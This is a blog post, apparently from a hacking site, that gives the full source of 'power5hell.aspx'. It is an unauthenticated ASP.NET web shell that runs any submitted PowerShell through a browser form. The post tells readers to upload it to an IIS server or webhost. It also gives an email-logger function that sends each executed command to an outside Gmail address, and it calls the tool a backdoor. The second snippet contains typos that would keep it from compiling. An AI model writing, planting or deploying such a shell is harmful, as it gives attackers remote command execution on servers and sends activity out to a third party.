PHP and Website Security ProjectX

power5hell.aspx – Power shell for asp.net Pentesting Tool

power5hell.aspx

According to Microsoft

“Microsoft Windows PowerShell command line shell and scripting language helps IT professionals achieve greater control and productivity. Using a new admin-focused scripting language, more than 130 standard command line tools, and consistent syntax and utilities, Windows PowerShell allows IT professionals to more easily control system administration and accelerate automation. Windows PowerShell is easy to adopt, learn, and use, because it works with your existing IT infrastructure and existing script investments, and because it runs on Windows XP, Windows Vista, and Windows Server 2003. Windows PowerShell is now included as part of Windows Server 2008 and can be evaluated in Windows Server 2008 Beta 3. Exchange Server 2007, System Center Operations Manager 2007, System Center Data Protection Manager V2, and System Center Virtual Machine Manager also leverage Windows PowerShell to improve administrator control, efficiency, and productivity.”

Source Code

<%@ Page Language=”C#” %>
<%@ Import Namespace=”System.Collections.ObjectModel”%>
<%@ Import Namespace=”System.Management.Automation”%>
<%@ Import Namespace=”System.Management.Automation.Runspaces”%>
<%@ Assembly Name=”System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31BF3856AD364E35″%>

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>

<script runat=”server”>

// Runs the supplied text as a PowerShell script in a fresh runspace and
// returns the pipeline's output as one string. No validation or filtering
// of scriptText happens in this method: whatever the caller passes is
// executed as-is (presumably under the identity of the IIS worker process
// hosting the page — not shown here).
//
// scriptText: PowerShell source to execute.
// returns:    the Out-String rendering of the results, one line per result
//             object, or "Error: <message>" if anything threw.
private static string Power5hell(string scriptText)
{
try
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();

Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(scriptText);
// Out-String is appended so every result object is already rendered as text.
pipeline.Commands.Add(“Out-String”);

Collection<PSObject> results = pipeline.Invoke();
// Close() is only reached on the success path: if Invoke() throws, the
// runspace is never closed (there is no finally block).
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
stringBuilder.AppendLine(obj.ToString());

return stringBuilder.ToString();
}catch(Exception exception)
{
// Any failure is reported back as text rather than thrown, so the
// exception message is returned to whoever submitted the script.
return string.Format(“Error: {0}”, exception.Message);
}
}

// Page lifecycle handler. On a postback, any non-empty value in
// inputTextBox is handed to Power5hell() and the result is shown in
// outputTextBox. The only conditions checked are IsPostBack and a
// non-empty input; no authentication or authorization check is visible in
// this handler or in the page markup as listed, so any client that can
// reach the page can submit scripts.
protected void Page_Load(object sender, EventArgs e)
{
if (Page.IsPostBack)
{
if(inputTextBox.Text.Length > 0)
{
outputTextBox.Text = Power5hell(inputTextBox.Text.Trim());
// The input box is cleared after each run.
inputTextBox.Text = string.Empty;
}
}
}
</script>

<html xmlns=”http://www.w3.org/1999/xhtml”>
<head runat=”server”>
<title>impeldown power5hell</title>
<style type=”text/css”>
.style1
{
color: #0033CC;
font-weight: bold;
}
.style2
{
color: #FFFFFF;
font-weight: bold;
}
</style>
</head>
<body bgcolor=”#000000″>
<form id=”form1″ runat=”server”>
<div style=”color: #FF0000″>

<span>::impeldown</span>
<span>power5hell</span><span>::<br />
Greetz to: TheProjectX</span><span><br />
</span><br />

</div>
<asp:TextBox ID=”outputTextBox” runat=”server” BackColor=”Black”
ForeColor=”#33CC33″ Height=”426px” ReadOnly=”True” TextMode=”MultiLine”
Width=”715px” ToolTip=”Power5hell output”></asp:TextBox>
<br />
<asp:TextBox ID=”inputTextBox” runat=”server” Width=”715px”
ToolTip=”Enter power5hell command here”></asp:TextBox>
</form>
</body>
</html>

Upload this to your IIS Server or webhost then try the power5hell with your favorite web browser.

You can also add an email logger to your ASP.NET shell; try this sample function.

// Sends one HTML e-mail through the given SMTP host using explicit
// username/password credentials over SSL. Returns true on success and
// false on any exception; the exception itself is discarded, so a caller
// cannot tell why delivery failed.
//
// mailAccount: sender address, also used as the SMTP login name.
// password:    SMTP password, passed in clear as a string.
// to:          single recipient address.
// subject:     mail subject.
// message:     mail body, sent as HTML.
// smtp:        SMTP host name.
public bool SendMail(string mailAccount, string password, string to, string subject, string message, string smtp)
{
try
{
NetworkCredential loginInfo = new NetworkCredential(mailAccount, password);
MailMessage msg = new MailMessage();
msg.From = new MailAddress(mailAccount);
msg.To.Add(new MailAddress(to));
msg.Subject = subject;
msg.Body = message;
msg.IsBodyHtml = true;
SmtpClient client = new SmtpClient(smtp); //example: “smtp.gmail.com”
client.EnableSsl = true;
client.UseDefaultCredentials = false;
client.Credentials = loginInfo;
// NOTE(review): neither msg nor client is disposed here (both are IDisposable).
client.Send(msg);

return true;
}
catch (Exception)
{
// Swallows every failure, including non-SMTP ones such as a malformed address.
return false;
}
}

Example using Gmail:

// Variant of Page_Load that, after running the submitted command, also
// mails a copy of it via SendMail(). The mailbox credentials and recipient
// are string literals in the page source, so anyone who can read the
// deployed file can also read the mailbox password; for an incident
// responder, those literals are an artefact worth recording.
protected void Page_Load(object sender, EventArgs e)
{
if (Page.IsPostBack)
{
if(inputTextBox.Text.Length > 0)
{
string cmd = inputTextBox.Text.Trim()
outputTextBox.Text = Power5hell(cmd);
inputTextBox.Text = string.Empty;
sting msg = string.format(“Executing {0}”, cmd);
// The account, password and recipient below are placeholder example values.
if(SendMail(“youraccount@gmail.com”, “myp4ss”, “tologaccount@gmail.com”, “power5hell”, msg, “smtp.gmail.com”))
{
//Additional code goes here if successfully mailed
}else
{
//Otherwise…
}
}
}
}

 

This is also considered a backdoor, so use it at your own risk!!!
